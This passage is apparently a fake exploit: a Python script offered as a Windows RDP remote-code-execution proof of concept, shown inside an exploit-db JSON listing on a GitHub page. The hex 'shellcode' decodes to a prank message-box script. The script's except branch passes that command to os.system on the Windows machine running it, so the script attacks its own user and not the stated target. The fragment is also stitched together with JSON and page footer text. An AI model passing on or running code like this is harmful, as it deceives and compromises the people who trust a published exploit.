#shellcode\r\nsc+=\"\\x72\\x69\\x70\\x74\\x3A\\x6D\\x73\\x67\\x62\\x6F\"\r\nsc+=\"\\x78\\x28\\x22\\x79\\x6F\\x75\\x20\\x70\\x6C\\x61\"\r\nsc+=\"\\x79\\x20\\x62\\x61\\x73\\x6B\\x65\\x74\\x62\\x61\"\r\nsc+=\"\\x6C\\x6C\\x20\\x6C\\x69\\x6B\\x65\\x20\\x63\\x61\"\r\nsc+=\"\\x69\\x78\\x75\\x6B\\x75\\x6E\\x21\\x22\\x2C\\x36\"\r\nsc+=\"\\x34\\x2C\\x22\\x4B\\x38\\x67\\x65\\x67\\x65\\x3A\"\r\nsc+=\"\\x22\\x29\\x28\\x77\\x69\\x6E\\x64\\x6F\\x77\\x2E\"\r\nsc+=\"\\x63\\x6C\\x6F\\x73\\x65\\x29\";\r\n\r\nHOST = sys.argv[1]\r\nPORT = 3389\r\nprint \"Win2003 & Win2008 RDP POC\"\r\nprint \"Target: \"+HOST\r\nrecexec=buf\r\nfor i in range(8):\r\n\ttry:\r\n\t\t s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t s.connect((HOST,PORT))\r\n\t\t print \"sending: %d bytes\" % len(buf)\r\n\t\t s.send(buf)\r\n\t\t rec = s.recv(100)\r\n\t\t recexec=sc\r\n\t\t print \"received: %d bytes\" % len(rec)\r\n\t\t s.close()\r\n\t\t print \"\"\r\n\texcept:\r\n\t\tif(platform.system()==\"Windows\"):\r\n\t\t\tos.system(recexec)", "id": "edb-id46904", "href": "https:\/\/www.exploit-db.com\/download\/46904", "title": "Microsoft Windows 7\/2003\/2008 RDP - Remote Code Execution"}]</script></body></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment